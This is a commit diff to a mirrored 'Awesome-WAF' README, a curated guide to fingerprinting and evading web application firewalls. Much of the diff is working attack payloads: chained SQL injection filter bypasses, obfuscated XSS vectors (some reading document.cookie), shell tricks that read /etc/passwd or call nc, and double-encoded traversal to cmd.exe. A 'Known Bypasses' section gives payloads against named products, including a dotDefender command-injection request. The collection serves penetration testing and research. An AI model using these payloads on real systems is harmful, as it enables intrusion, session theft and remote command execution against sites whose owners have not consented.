Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

Added more stuff

Browse Source
This commit is contained in:
0xInfection 2019-02-26 12:14:18 +05:30
parent 6eae91aff8
commit e1d0be8874
1 changed files with 197 additions and 135 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

332
README.md
View File

@ -10,19 +10,38 @@ __A Concise Definition:__ A web application firewall is a security policy enforc
Feel free to [contribute](CONTRIBUTING.md).
### Contents:
- [Awesome WAFs List](#awesome-waf-list)
- [Awesome Testing Methodology](#testing-methodology)
- [Awesome WAF Detection](#waf-detection)
- [Awesome Evasion Techniques](#evasion-techniques)
- [Awesome Tools](#awesome-tools)
- [Awesome Blogs & Writeups](#blogs-and-writeups)
- [Introduction](#introduction)
- [How WAFs Work](#how-wafs-work)
- [Operation Modes](#operation-modes)
- [Testing Methodology](#testing-methodology)
- [Where To Look](#where-to-look)
- [Detection Techniques](#detection-techniques)
- [WAF Fingerprints](#waf-fingerprints)
- [Evasion Techniques](#evasion-techniques)
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
- [Regex Reversing](#regex-reversing)
- [Obfuscation/Encoding](#obfuscation)
- [Browser Bugs](#browser-bugs)
- [HTTP Header Spoofing](#request-header-spoofing)
- [Google Dorks Approach](#google-dorks-approach)
- [Known Bypasses](#known-bypasses)
- [Awesome Tooling](#awesome-tools)
- [Fingerprinting](#fingerprinting)
- [Testing](#testing)
- [Evasion](#evasion)
- [Blogs & Writeups](#blogs-and-writeups)
- [Video Presentations](#video-presentations)
- [Awesome Presentations & Papers](#presentations--research-papers)
- [Research Papers](#research-papers)
- [Presentation Slides](#presentations)
- [Licensing & Credits](#credits--license)
## How WAFs Work:
## Introduction:
### How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
## Operation Modes:
### Operation Modes:
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, and are highly effective against an major types of DDoS attacks. Eg. Rule for blocking all `<script>*</script>` inputs.
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking possible cyber-attacks, but whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
@ -42,14 +61,14 @@ Feel free to [contribute](CONTRIBUTING.md).
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
4. If there is some search box or input field somewhere, try detecting payloads like `<script>alert()</script>`.
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
## WAF Detection
## WAF Fingerprints
Wanna detect WAFs? Lets see how.
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
@ -1426,13 +1445,14 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
- [Other Payloads](https://github.com/foospidy/payloads)
#### Technique:
- Load up your wordlist into fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
- Always use proxies, since chances are real that your IP gets blocked.
- Always use proxychains, since chances are real that your IP gets blocked.
#### Drawbacks:
- This method often fails.
@ -1448,62 +1468,53 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
### Keyword Filter Detection/Bypass
__SQL Injection__
__Example__: SQL Injection
##### • Step 1:
__Keyword filer__: `and`, `or`, `union`
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`
- __Filtered Injection__: `union select user, password from users`
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
##### • Step 2:
__Keyword filer__: `and`, `or`, `union`, `where`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
##### • Step 3:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
##### • Step 4:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
##### • Step 5:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
##### • Step 6:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || user_id is not null`
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
##### • Step 7:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
##### • Step 8:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
- __Bypassed Injection__: `1 || lpad(user,7,1)`
##### • Step 9:
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)`
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
- __Filtered Injection__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
@ -1513,91 +1524,125 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
- You can encode whole payload, or some parts of it and test recursively.
#### Techniques:
__1. URL Encoding__
__1. Case Toggling__
- Some poorly developed WAFs filter selectively specific case WAFs.
- We can combine upper and lower case characters for developing efficient payloads.
__Standard__: `<script>alert()</script>`
__Bypassed__: `<ScRipT>alert()</sCRipT>`
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
__Bypassed__: `sELecT * FrOM all_tables whERe OwNeR = 'DATABASE_NAME'`
__2. URL Encoding__
- Encode normal payloads with % encoding/URL encoding.
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
- Burp includes a in-built encoder/decoder.
Blocked: `<svG/x=">"/oNloaD=confirm()//`
Bypassed: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
__Blocked__: `<svG/x=">"/oNloaD=confirm()//`
__Bypassed__: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
Blocked: `.0union(select 1,2,3,4,5,6,7,8,9,10,11,12)`
Bypassed: `%2e%30%75%4e%49%4f%6e%28%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%29`
__Blocked__: `uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)`
__Bypassed__: `uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29`
__2. Unicode Encoding__
- Most modern web-apps support UTF-8.
__3. Unicode Encoding__
- Most modern web-apps support UTF-8 and hence are prone to this method.
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
- You can encode entire/part of the payload for obtaining results.
Standard: `prompt()`
Obfuscated: `pro\u006dpt()`
__Standard__: `prompt()`
__Obfuscated__: `pro\u006dpt()`
Standard: `../../appusers.txt`
Obfuscated: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
__Standard__: `../../appusers.txt`
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
__BONUS:__
If the application allows alternate charset interpretation, i.e. if the web app interprets `а` or `ā` as `a`,. the attack vectors get more diverse.
Standard: prompt()
Variant: рrомрt()
__3. HTML Encoding__
__4. HTML Encoding__
- Often web apps encode special characters into HTML encoding and render accordingly.
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
Standard: `"><img src=x onerror=confirm()>`
Encoded: `&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt;` (General form)
Encoded: `&#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62;` (Numeric reference)
__Standard__: `"><img src=x onerror=confirm()>`
__Encoded__: `&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt;` (General form)
__Encoded__: `&#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62;` (Numeric reference)
__4. Mixed Encoding__
__5. Mixed Encoding__
- WAF rules often tend to filter out a single type of encoding.
- This type of filters can be bypassed by mixed encoding payloads.
- Tabs and newlines further add to obfuscation.
Standard: `<script/src=data;text/javascript, alert()></script>`
Obfuscated: `<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74()></script>`
__Obfuscated__:
```
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
```
__5. Using Comments__
__6. Using Comments__
- Comments obfuscate standard payload vectors.
- Different payloads have different ways of obfuscation.
Blocked: `<script>alert()</script>`
Bypassed: `<!--><script>alert/**/()/**/</script>`
__Blocked__: `<script>alert()</script>`
__Bypassed__: `<!--><script>alert/**/()/**/</script>`
Blocked: `/?id=1+union+select+1,2,3---`
Bypassed: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
__Blocked__: `/?id=1+union+select+1,2,3---`
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
__6. Double Encoding__
__7. Double Encoding__
- Often WAF filters tend to encode characters to prevent attacks.
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
Standard: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
Obfuscated: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
Standard: `<script>alert('XSS')</script>`
Obfuscated: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
__Standard__: `<script>alert('XSS')</script>`
__Obfuscated__: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
__7. Wildcard Encoding__
__8. Wildcard Encoding__
- Globbing patterns are used by various command-line utilities to work with multiple files.
- We can tweak them to execute system commands.
- Specific to remote code execution vulnerabilities on linux systems.
Standard: `/bin/cat /etc/passwd`
Obfuscated: `/???/??t /???/??ss??`
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/???/??t /???/??ss??`
Used chars: `/ ? t s`
Standard: `/bin/nc 127.0.0.1 1337`
Obfuscated: `/???/n? 2130706433 1337`
__Standard__: `/bin/nc 127.0.0.1 1337`
__Obfuscated__: `/???/n? 2130706433 1337`
Used chars: `/ ? n [0-9]`
__8. String Concatenation__
__9. String Concatenation__
- Different programming languages have different syntaxes and patterns for concatenation.
- This allows us to effectively generate payloads that can bypass many filters and rules.
Standard: `/bin/cat /etc/passwd`
Obfuscated: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
> Bash allows path concatenation for execution.
Standard: `<iframe/onload='this["src"]="javascript:alert()"';>`
Obfuscated: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>`
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
__Obfuscated__: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>`
__9. Junk Chars__
- Normal payloads get filtered out easily.
- Adding some junk chars avoid detection (specific cases only).
__Standard__: `<script>alert()</script>`
__Obfuscated__: `<script>+-+-1-+-+alert(1)</script>`
__Standard__: `<a href=javascript;alert()>ClickMe `
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe`
__10. Line Breaks__
- Many WAF with regex based filtering effectively blocks many attempts.
- Line breaks (CR/LF) can break firewall regex and bypass stuff.
__Standard__: `<iframe src=javascript:alert(0)">`
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
__11. Uninitialized Variables__
- Uninitialized bash variables can elude regular expression based filters and pattern match.
- Uninitialised variables have value null/they act like empty strings.
- Both bash and perl allow this kind of interpretations.
__Standard__: `cat /etc/passwd`
__Obfuscated__: `cat$u $u/etc$u/passwd$u`
### Browser Bugs:
#### Charset Bugs:
@ -1606,12 +1651,12 @@ Obfuscated: `<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';
Example request:
<pre>
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
</pre>
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
@ -1703,13 +1748,35 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
`site:pastebin.com +<wafname> bypass`
## Known Bypasses:
### __Cloudflare__
### Citrix NetScaler
- HTTP Parameter Pollution (NS10.5) [@BGA Security](https://www.exploit-db.com/?author=7396)
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string> union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
```
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
```
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
```
### Cloudflare
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
```
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
```
### __Barracuda__
### Comodo
- SQLi by [@WAFNinja](https://waf.ninja)
```
0 union/**/select 1,version(),@@datadir
```
### Barracuda
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
```
<body style="height:1000px" onwheel="alert(1)">
@ -1725,36 +1792,6 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
```
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
```
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
```
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
```
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
```
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
### __DotDefender__
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
```
@ -1765,8 +1802,7 @@ PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
```
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
@ -1778,8 +1814,7 @@ Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
../;pwd;&action=deletesite&linenum=15
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
```
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
```
@ -1896,40 +1931,60 @@ state=%2527+and+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
```
### __Citrix NetScaler NS10.5__
- HTTP Parameter Pollution [@BGA Security](https://www.exploit-db.com/?author=7396)
### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string> union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
- XSS Bypass by [@WAFNinja](https://waf.ninja)
```
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
```
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
```
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
```
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
```
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
```
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
### __WebKnight__
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
```
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<img src=x onwheel=prompt(1)>
```
- SQLi by [@WAFNinja](https://waf.ninja)
```
0 union(select 1,username,password from(users))
0 union(select 1,@@hostname,@@datadir)
```
### __QuickDefense__
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
```
?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>
```
### __Apache__
- Writing method type in lowercase. [Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
```
get /login HTTP/1.1
Host: favoritewaf.com
@ -1937,7 +1992,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
### __IIS__
- Tabs before method _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
```
GET /login.php HTTP/1.1
Host: favoritewaf.com
@ -2032,6 +2087,10 @@ X-Remote-Addr: 127.0.0.1
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://sunnyhoi.com).
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://github.com/0x09al).
## Video Presentations
- [WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior](https://www.youtube.com/watch?v=tSf_IXfuzXk) from [@OWASP](https://owasp.org).
- [Fingerprinting Filter Rules of Web Application Firewalls](https://www.usenix.org/conference/woot12/workshop-program/presentation/schmitt) from [@UseNix](https://www.usenix.com).
## Presentations & Research Papers
### Research Papers:
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
@ -2046,11 +2105,14 @@ X-Remote-Addr: 127.0.0.1
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
### Presentations:
- [Methods to Bypass a Web Application Firewall](presentrations/Methods%20To%20Bypass%20A%20Web%20Application%20Firewall.pdf) - A presentation from [PT Security](https://www.ptsecurity.com) about bypassing WAF filters and evasion.
- [Web Application Firewall Bypassing (How to Defeat the Blue Team)](presentation/Web%20Application%20Firewall%20Bypassing%20(How%20to%20Defeat%20the%20Blue%20Team).pdf) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by [@OWASP](https://owasp.org).
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [Our Favorite XSS Filters/IDS and how to Attack Them](presentations/Our%20Favourite%20XSS%20WAF%20Filters%20And%20How%20To%20Bypass%20Them.pdf) - A presentation about how to evade XSS filters set by WAF rules from [BlackHat USA 09](https://www.blackhat.com/html/bh-us-09/)
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
<!--stackedit_data:
eyJoaXN0b3J5IjpbMTgwNDI2NTY1OF19
-->
## Credits & License:
This work has been presented by [Infected Drake](https://twitter.com/0xInfection) and is licensed under the [Apache 2.0 License](LICENSE).